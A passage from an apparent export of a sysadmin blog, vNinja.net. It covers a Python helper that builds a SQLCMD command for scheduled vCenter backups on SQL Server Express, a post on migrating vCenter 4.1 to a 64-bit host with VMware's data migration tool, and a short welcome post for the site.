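SQLCMD = r'C:\Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE'

def backup_command(servername: str,
                   instance: str = 'SQLEXP_VIM',
                   script: str = r'c:\scripts\FullBackupVCDB.sql') -> str:
    """Return the full command line to paste into the scheduled task.
    Only the executable path is quoted, since it contains spaces."""
    return f'"{SQLCMD}" -S {servername}\\{instance} -i {script}'

print(backup_command('[servername]'))
```

Paste the resulting string straight into the Program/Script field of the task, and you avoid hand-typing the quoting twice.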
Click Next and check the box that says Open the Properties dialog for this task when I click Finish, then click Finish. In the VCDB Backup properties, make sure the Run whether user is logged on or not option is selected, so the schedule runs as planned. Once you have verified that the schedule works as intended, make sure you include the location of your vCenter database backups in your regular backup scheme, and you should be a lot safer than you were. That's it! Scheduled vCenter backups on SQL Server Express 2005. Thanks to Chris Dearden over at J.F.V.I who helped me out with getting my sqlcmd.exe syntax corrected for the scheduled task! --- # Migrating your vCenter from 32bit to 64bit URL: https://vNinja.net/virtualization/migrating-your-vcenter-from-32bit-to-64bit/ Date: 2010-07-21 Author: christian Tags: Maintenance, Ops, Upgrade, vCenter, VMware As you may or may not know, the new vCenter 4.1 requires a 64-bit host to run on. As many existing installations run on 32-bit hosts, this probably means that when you upgrade you will need to move your existing database to a new host. There are several ways of doing the migration, but one of them is to back up your existing database, restore it on a new host, point the new vCenter 4.1 installation at the existing database, and have the installer upgrade it for you. I'm sure you would like to automate that process, just to limit the possibility of manual screw-ups, right? Thankfully, VMware had the same idea. In chapter 5 of the vSphere Upgrade Guide, VMware outlines the different methods you can use when migrating your vCenter database, and on page 39 a data migration tool makes its appearance. This two-step process takes a backup of your existing vCenter SQL Server Express database and dumps it to a predefined local folder. You then copy the entire migration tool folder to the new host and run the second part of the tool to install vCenter 4.1 and import the old database. 
I used this tool to migrate our setup from Windows Server 2003 32-bit to Windows Server 2008 R2 64-bit without problems. The only thing you need to be aware of is that VMware Update Manager is still a 32-bit application and requires that you manually create a 32-bit DSN for the database. This is mentioned in the VUM Installation and Administration Guide, but not in the vSphere Upgrade Guide. All in all, this tool is a great assistant for everyone who needs to migrate to a new host for 64-bit support in vCenter Server 4.1. While it could be more polished, offer a GUI, and let you use network storage for the backups, it does the job at hand very well. After all, who needs a polished GUI application for a one-off job like this? Related VMware Knowledgebase Articles #

- vSphere 4.1 upgrade pre-installation requirements and considerations
- Migrating an existing vCenter Server database to 4.1 using the data migration tool
- vCenter Server 4.1 Data Migration Tool fails with the error: HResult 0x2, Level 16, State 1
- Using the Data Migration Tool to upgrade from vCenter Server 4.0 to vCenter Server 4.1 fails

--- # Welcome to vNinja! URL: https://vNinja.net/news/welcome-to-vninja/ Date: 2010-07-21 Author: christian Tags: Welcome to my new playground. I used to post quite a lot over at my old site, h0bbel.p0ggel.org, but given its weird domain name and its long history I've decided to start fresh. This new site will be dedicated to all things virtualization, PowerShell, Windows Server management, and possibly even some Citrix products thrown in here and there. I might even go on about App-V, but that remains to be seen. My main focus will be solutions for SMB users. There is a lot of information out there, but much of it is focused on large corporations with large IT teams. Sadly that's not the reality for many of us, and we have to fill lots of different roles (e.g. server admin, network admin, storage admin, etc.). 
For now, there isn't a whole lot of content here, but it'll start trickling in as soon as I have something to share. If you have any topics or ideas for posts I should do, please do not hesitate to leave a comment. ---